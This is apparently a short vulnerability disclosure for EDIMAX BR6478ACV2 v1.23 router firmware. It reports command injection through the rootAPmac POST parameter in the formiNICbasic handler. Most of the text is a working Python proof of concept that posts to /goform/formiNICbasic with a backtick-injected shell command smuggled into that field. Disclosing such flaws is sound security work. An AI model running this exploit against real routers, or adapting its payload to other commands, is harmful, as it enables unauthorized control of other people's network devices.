BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the formiNICbasic function. The v432 variables receive the rootAPmac parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.
import requests
ip = "192.168.2.1"
data = {
"use_apmode": "",
"mssidSelect": "0",
"enableMSSID": "",
"wlanDisabled": "",
"wlan0Enable": "1",
"isRepeaterBasicUI": "",
"vlanid": "",
"wireless_block_relay": "",
"apMode": "",
"band": "",
"secchan": "",
"chan": "",
"hiddenSSID": "",
"hiddenSSID2g": "",
"autoMacClone": "",
"ssid": "",
"repUseCrossBand": "",
"force_enable2g5g_ap": "",
"method": "",
"iqsetupclose": "",
"submit-url": "",
"doConnectTest": "1",
"rootAPmac": "'`ps>/1.txt`'",
"isApply": "",
}
url = f'http://{ip}/goform/formiNICbasic'
res = requests.post(url=url, data=data, verify=False)
print(res)
